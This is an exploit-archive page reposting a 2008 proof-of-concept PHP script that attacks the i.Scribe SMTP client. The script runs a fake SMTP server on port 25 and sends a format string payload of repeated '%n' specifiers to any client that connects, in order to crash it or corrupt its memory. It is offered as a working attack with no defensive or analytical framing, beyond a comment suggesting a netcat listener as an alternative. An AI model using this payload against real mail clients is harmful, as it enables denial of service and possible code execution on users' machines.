i.Scribe SMTP Client <= 2.00b (wscanf) Remote Format String PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : i.Scribe SMTP Client <= 2.00b (wscanf) Remote Format String PoC
# Published : 2008-11-27
# Author : Alfons Luja
# Previous Title : Microsoft Office Communicator (SIP) Remote Denial of Service Exploit
# Next Title : Google Chrome Browser MetaCharacter URI Obfuscation Vulnerability

<?php 
//I dont have c lol
/*___=++++++++++++__=--=________*****
 0-- 
  --  i.Scribe smtp client v 1.88 to 2.00 beta
      Format String (wscanf) bug p0c
      vendor : Memecode Software 
      grTs;SiD.psycho 
      A.Luja 27.11.08  

--)(________++++++++++++++++++++---*** 

___00)_- NOTE!!! you must enabled extension=php_sockets.dll in php.ini ___==
          Or just open nc -l -p 25 lol*/
$host= $_SERVER[SERVER_ADDR];
$port= 25;
$ret = "AAAA%n%n%n%n%n%n%n%n%n";
$socket = socket_create(AF_INET, SOCK_STREAM, 0) or die ("socket errorn"); 
$bind = socket_bind ($socket, $host, $port) or die ("bind errorn"); 
$listen = socket_listen($socket,1) or die("listen errorn");
printf("--==Fake smtp server ready==----n");
printf("Now connect here witch iScribe clientn");
if(($acp=socket_accept($socket))!==false){
    printf("Target connectedn");
    sleep(2);
    printf("send evil charn");
    $hello=socket_write($acp,$ret,strlen($ret));  
    printf("donen");
    socket_close($acp);
}
socket_close($socket);
exit();
?>

//Alfons Luja

# www.Syue.com [2008-11-27]